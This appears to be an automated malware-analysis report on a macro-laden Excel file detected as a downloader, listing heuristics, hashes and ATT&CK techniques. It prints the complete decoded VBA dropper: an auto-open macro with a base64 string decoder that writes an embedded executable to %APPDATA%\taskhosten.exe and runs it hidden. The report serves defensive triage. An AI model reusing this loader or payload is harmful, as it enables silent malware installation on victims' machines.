Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a52ba498d304906d…

MALICIOUS

Office (OLE)

68.0 KB Created: 2015-11-16 14:31:26 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: 180fe86db301b9ad3f2ad6b6a12b3411 SHA-1: d245e02922513612d9babad8f50115b94588781b SHA-256: a52ba498d304906d6c060e8c56ad7db50e1af0a781616c0aa35447c50c28bae9
358 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains obfuscated VBA macros, including AutoOpen and Workbook_Open, which are designed to execute automatically. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates the macro uses a custom decoder and calls CreateObject and Shell functions. The 'SE_ENABLE_LURE' heuristic suggests the document prompts the user to enable macros. The script attempts to create a 'WScript.Shell' object, likely to download and execute a secondary payload, as indicated by the 'CLAMAV_DETECTION' for Win.Downloader.Carp.

Heuristics 11

  • ClamAV: Win.Downloader.Carp-6307520-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Downloader.Carp-6307520-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
     Shell uzwlcaktigemqvucvzix, vbHide
     End Sub
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
     On Error Resume Next
    Set hqdhfwoybiyesyjvigoz = CreateObject(LVFEnuYuOL("V1NjcmlwdC5TaGVsbA=="))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     On Error Resume Next
    Set hqdhfwoybiyesyjvigoz = CreateObject(LVFEnuYuOL("V1NjcmlwdC5TaGVsbA=="))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
    showDatagram
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
    Sub Workbook_Open()
    showDatagram
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly
    Attempted x86 opcode disassembly
    0000DB4A  41                inc ecx
    0000DB4B  41                inc ecx
    0000DB4C  41                inc ecx
    0000DB4D  41                inc ecx
    0000DB4E  41                inc ecx
    0000DB4F  41                inc ecx
    0000DB50  41                inc ecx
    0000DB51  41                inc ecx
    0000DB52  41                inc ecx
    0000DB53  41                inc ecx
    0000DB54  41                inc ecx
    0000DB55  41                inc ecx
    0000DB56  41                inc ecx
    0000DB57  41                inc ecx
    0000DB58  41                inc ecx
    0000DB59  41                inc ecx
    0000DB5A  41                inc ecx
    0000DB5B  41                inc ecx
    0000DB5C  41                inc ecx
    0000DB5D  41                inc ecx
    0000DB5E  41                inc ecx
    0000DB5F  41                inc ecx
    0000DB60  41                inc ecx
    0000DB61  41                inc ecx
    0000DB62  41                inc ecx
    0000DB63  41                inc ecx
    0000DB64  41                inc ecx
    0000DB65  41                inc ecx
    0000DB66  41                inc ecx
    0000DB67  41                inc ecx
    0000DB68  41                inc ecx
    0000DB69  41                inc ecx
    0000DB6A  41                inc ecx
    0000DB6B  41                inc ecx
    0000DB6C  41                inc ecx
    0000DB6D  41                inc ecx
    0000DB6E  41                inc ecx
    0000DB6F  41                inc ecx
    0000DB70  41                inc ecx
    0000DB71  41                inc ecx
    0000DB72  41                inc ecx
    0000DB73  41                inc ecx
    0000DB74  41                inc ecx
    0000DB75  41                inc ecx
    0000DB76  41                inc ecx
    0000DB77  41                inc ecx
    0000DB78  41                inc ecx
    0000DB79  41                inc ecx
    0000DB7A  41                inc ecx
    0000DB7B  41                inc ecx
    0000DB7C  41                inc ecx
    0000DB7D  41                inc ecx
    0000DB7E  41                inc ecx
    0000DB7F  41                inc ecx
    0000DB80  41                inc ecx
    0000DB81  41                inc ecx
    0000DB82  41                inc ecx
    0000DB83  41                inc ecx
    0000DB84  41                inc ecx
    0000DB85  41                inc ecx
    0000DB86  41                inc ecx
    0000DB87  41                inc ecx
    0000DB88  41                inc ecx
    0000DB89  41                inc ecx
    0000DB8A  41                inc ecx
    0000DB8B  41                inc ecx
    0000DB8C  41                inc ecx
    0000DB8D  41                inc ecx
    0000DB8E  41                inc ecx
    0000DB8F  41                inc ecx
    0000DB90  41                inc ecx
    0000DB91  41                inc ecx
    0000DB92  41                inc ecx
    0000DB93  41                inc ecx
    0000DB94  41                inc ecx
    0000DB95  41                inc ecx
    0000DB96  41                inc ecx
    0000DB97  41                inc ecx
    0000DB98  41                inc ecx
    0000DB99  41                inc ecx
    0000DB9A  41                inc ecx
    0000DB9B  41                inc ecx
    0000DB9C  41                inc ecx
    0000DB9D  41                inc ecx
    0000DB9E  41                inc ecx
    0000DB9F  41                inc ecx
    0000DBA0  41                inc ecx
    0000DBA1  41                inc ecx
    0000DBA2  41                inc ecx
    0000DBA3  41                inc ecx
    0000DBA4  41                inc ecx
    0000DBA5  41                inc ecx
    0000DBA6  41                inc ecx
    0000DBA7  41                inc ecx
    0000DBA8  41                inc ecx
    0000DBA9  41                inc ecx
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8433 bytes
SHA-256: 2f6ac28861387d5f7fc368eba769e14602863b7c6ab77ba6e4ae4550b43bbe41
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Sub showDatagram()

 On Error Resume Next
Set hqdhfwoybiyesyjvigoz = CreateObject(LVFEnuYuOL("V1NjcmlwdC5TaGVsbA=="))

Dim La, uzwlcaktigemqvucvzix As String
La = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAHjBXVYAAAAAAAAAAOAAAgELAQsAAAgAAAAEAAAAAAAA7icAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAKAnAABLAAAAAEAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA9AcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAA"
La = La + "CAAAGAucnNyYwAAABAAAAAAQAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADQJwAAAAAAAEgAAAACAAUAwCAAAOAGAAABAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswAwBAAAAAAQAAEXMQAAAKCigRAAAKcgEAAHAoEgAACgsHBnILAABwbxMAAAooFAAACgcoFQAACibeCgYsBgZvFgAACtzeAybeACoBHAAAAgAGACowAAoAAAAAAAAAADw8AAMBAAABHgIoFwAACipCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAAcAgAAI34AAIgCAADEAgAAI1N0cmluZ3MAAAAATAUAAEAAAAAjVVMAjAUAABAAAAAjR1VJRAAAAJwFAABEAQAAI0Jsb2IAAAAAAAAAAgAAAUcUAgAJAAAAAPolMw"
La = La + "AWAAABAAAAFgAAAAIAAAACAAAAFwAAAA0AAAABAAAAAQAAAAIAAAAAAAoAAQAAAAAABgAlAB4ABgBRADcABgB8AGoABgCTAGoABgCwAGoABgDPAGoABgDoAGoABgABAWoABgAcAWoABgA3AWoABgBvAVABBgCDAVABBgCRAWoABgCqAWoABgDnAccBBgAHAscBCgA1AioCBgBJAj8CBgBeAh4ABgB5Aj8CCgCfAowCBgCtAh4AAAAAAAEAAAAAAAEAAQAAABAAEwAAAAUAAQABAFAgAAAAAJEALAAKAAEAuCAAAAAAhhgxAA4AAQARADEAEgAZADEAEgAhADEAEgApADEAEgAxADEAEgA5ADEAEgBBADEAEgBJADEAEgBRADEAEgBZADEAFwBhADEAEgBpADEAEgBxADEAEgB5ADEAHACBADEADgCJADEADgCRAE4CIQCZAGUCJQCJAGwCKwChAH4CMQCpAKcCOACxALkCDgAJADEADgAuAAsARAAuABMAqgAuABsAxAAuACMAxAAuACsAxAAuADMAqgAuADsAygAuAEMAxAAuAFMAxAAuAFsA4gAuAGsADAEuAHMAGQEuAHsAIgE"
La = La + "+AASAAAABAAAAAAAAAAAAAAAAACUCAAAEAAAAAAAAAAAAAAABABUAAAAAAAQAAAAAAAAAAAAAAAEAHgAAAAAAAAAAPE1vZHVsZT4AZG93bi5leGUASwBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AE1haW4ALmN0b3IAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAU3lzdGVtLlJlZmxlY3Rpb24AQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5Q3VsdHVyZUF0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAQ29tVmlzaWJsZUF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEFzc2VtYmx5VmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZX"
La = La + "MAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkb3duAFN5c3RlbS5OZXQAV2ViQ2xpZW50AFN5c3RlbS5JTwBQYXRoAEdldFRlbXBGaWxlTmFtZQBTdHJpbmcAQ29uY2F0AERvd25sb2FkRGF0YQBGaWxlAFdyaXRlQWxsQnl0ZXMAU3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3MAU3RhcnQASURpc3Bvc2FibGUARGlzcG9zZQAAAAAACS4AZQB4AGUAADFoAHQAdABwADoALwAvAG4AcwAuADcAbgBpADcALgBjAG8AbQA6ADEANwAxADcALwAAAAAAelUbqVseP0SwtabW/Lm1XAAIt3pcVhk04IkDAAABAyAAAQQgAQEOBCABAQIEIAEBCAMAAA4FAAIODg4FIAEdBQ4GAAIBDh0FBQABElUOBQcCEkUOZQEAKS5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC4wLFByb2ZpbGU9Q2xpZW50AQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZR8uTkVUIEZyYW1ld29yayA0IENsaWVudCBQcm9maWxlGQEAFENvbnNvbGVBcHBsaWNhdGlvbjE2AAAFAQAAAAAXAQASQ29weXJpZ2h0IMKpICAyMDE1AAApAQAkZjVjMmU1NzEtM2JiNS00NWJhLTg4YWItN2QyZWZjZjk2MjZmAAAMAQAHMS4wLjAuMAAACAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQAAAMgnAAAAAAAAAAAAAN4nAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQJ"
La = La + "wAAAAAAAAAAX0NvckV4ZU1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
La = La + "CAAAAwAAADwNwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="

uzwlcaktigemqvucvzix = hqdhfwoybiyesyjvigoz.ExpandEnvironmentStrings(LVFEnuYuOL("JUFQUERBVEEl")) & LVFEnuYuOL("XHRhc2tob3N0ZW4uZXhl")

Set wawescrknzcukmwelbsx = CreateObject(LVFEnuYuOL("QURPREIuU3RyZWFt"))
wawescrknzcukmwelbsx.Open
wawescrknzcukmwelbsx.Type = 1
wawescrknzcukmwelbsx.Write merde(La)
wawescrknzcukmwelbsx.Position = 0
wawescrknzcukmwelbsx.SaveToFile uzwlcaktigemqvucvzix
wawescrknzcukmwelbsx.Close
 
 Shell uzwlcaktigemqvucvzix, vbHide
 End Sub

Private Function merde(bobby)
  Dim DM, EL
  Set DM = CreateObject(LVFEnuYuOL("TWljcm9zb2Z0LlhNTERPTQ=="))
  Set EL = DM.createElement(LVFEnuYuOL("dG1w"))
  EL.DataType = LVFEnuYuOL("YmluLmJhc2U2NA==")
  EL.Text = bobby
  merde = EL.NodeTypedValue
End Function

Function LVFEnuYuOL(ByVal yyPdMVSXBI)
  Const HEgTymDLVn = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  
  yyPdMVSXBI = Replace(yyPdMVSXBI, vbCrLf, "")
  yyPdMVSXBI = Replace(yyPdMVSXBI, vbTab, "")
  yyPdMVSXBI = Replace(yyPdMVSXBI, " ", "")
  
  dataLength = Len(yyPdMVSXBI)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "LVFEnuYuOL", ""
    Exit Function
  End If

  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0
    For CharCounter = 0 To 3
      thisChar = Mid(yyPdMVSXBI, groupBegin + CharCounter, 1)
      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, HEgTymDLVn, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "LVFEnuYuOL", ""
        Exit Function
      End If
      nGroup = 64 * nGroup + thisData
    Next
    nGroup = Hex(nGroup)
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    sOut = sOut & Left(pOut, numDataBytes)
  Next
  LVFEnuYuOL = sOut
End Function

Sub AutoOpen()
showDatagram
End Sub
Sub Workbook_Open()
showDatagram
End Sub







Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True